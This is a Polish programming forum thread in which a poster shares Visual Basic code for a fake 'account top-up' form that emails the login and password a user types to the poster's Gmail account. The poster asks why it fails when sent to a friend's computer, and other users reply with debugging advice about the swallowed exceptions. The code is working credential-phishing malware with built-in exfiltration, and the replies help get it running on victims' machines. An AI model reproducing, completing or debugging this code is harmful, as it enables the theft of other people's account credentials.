Keylogger

0

Witam. Mam taki problem, po stworzeniu keyloggera w Visual Basic 2010 keylogger działa dobrze, ale tylko na moim komputerze. Gdy wpisze passy i kliknę wyślij to na moim komputerze działa to dobrze i dostaję po chwili maila na konto gmail. Sprawa ma się inaczej gdy wyślę keyloggera koledze, który ma inne ip i komputer i jak on wpisze passy i kliknie wyślij to nie dostaje ich na maila.
Prosiłbym bym o pomoc jeżeli ktoś wie jak rozwiązać ten problem.
Niżej załączam komendy w MVB2010:

Imports System
Imports System.Threading
Imports System.Net.Mail
Public Class Form1
 
    Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click
        Timer1.Start()
 
        Dim MyMailMessage As New MailMessage()
        Try
            MyMailMessage.From = New MailAddress("email")
            MyMailMessage.To.Add("email")
            MyMailMessage.Subject = ("Nowe hasło")
            MyMailMessage.Body = "Login: " + TextBox1.Text & vbCrLf + "Hasło: " + TextBox2.Text
            Dim SMTP As New SmtpClient("smtp.gmail.com")
            SMTP.Port = 587
            SMTP.EnableSsl = True
            SMTP.Credentials = New System.Net.NetworkCredential("email", "hasło")
            SMTP.Send(MyMailMessage)
            TextBox2.Text = ""
        Catch ex As Exception
        End Try
    End Sub
 
    Private Sub Timer1_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer1.Tick
        ProgressBar1.Increment(1)
        If ProgressBar1.Value = 100 Then
            Label7.Text = "Konto zostanie doładowane"
        End If
    End Sub
End Class

Jest to praca na informatykę. Chciałem pokazać pani, że potrafię zrobić keyloggera ponieważ mieliśmy niedawno taki temat.

0

Ty tak serio?

Catch ex As Exception

o_O
Weź może łaskawie wypisz wyjątek jaki leci to może będziesz wiedział co nie zadziałało? ;]

0

Dopiero zaczynam w tym pracować. Gdybym wiedział dlaczego program nie działa z innym ip to bym to naprawił, ale tak nie jest dlatego poprosiłem o pomoc

0
Dainamo napisał(a):

Dopiero zaczynam w tym pracować. Gdybym wiedział dlaczego program nie działa z innym ip to bym to naprawił, ale tak nie jest dlatego poprosiłem o pomoc.

No jest napisane, że program wychwytuję wszystkie wyjątki. Ale nwm co z tym dalej zrobić, w sensie co zmienić

0

Dlaczego uważasz, że ma to coś wspólnego z IP?

0

Właśnie nwm w czym jest problem. Przypuszczam, że jest to ip albo coś z tym związanego.

0

To nie przypuszczaj tylko łaskawie WYPISZ te wyjątki które sobie tak ochoczo łapiesz. Bo teraz jeśli COKOLWIEK pójdzie nie tak z wysyłaniem maila, to ty łykniesz ten błąd swoim catch i tyle. I efekt jest taki że nie wiadomo czemu nie działa...

0

Jak wypisać te wyjątki i o jakie wyjątki chodzi. Przepraszam za takie głupie odpowiedzi, ale naprawdę jestem w tym zielony

0

A wiesz co robi ten kod, czy tylko skopiowałeś gotowy skrypt skądś?

0

Tam, gdzie masz:

Catch ex As Exception
End Try

Wstaw sobie (po catch) coś w stylu: MessageBox.Show(ex.Message) i pokażą ci się ewentualne błędy w działaniu tego programu.

1 użytkowników online, w tym zalogowanych: 0, gości: 1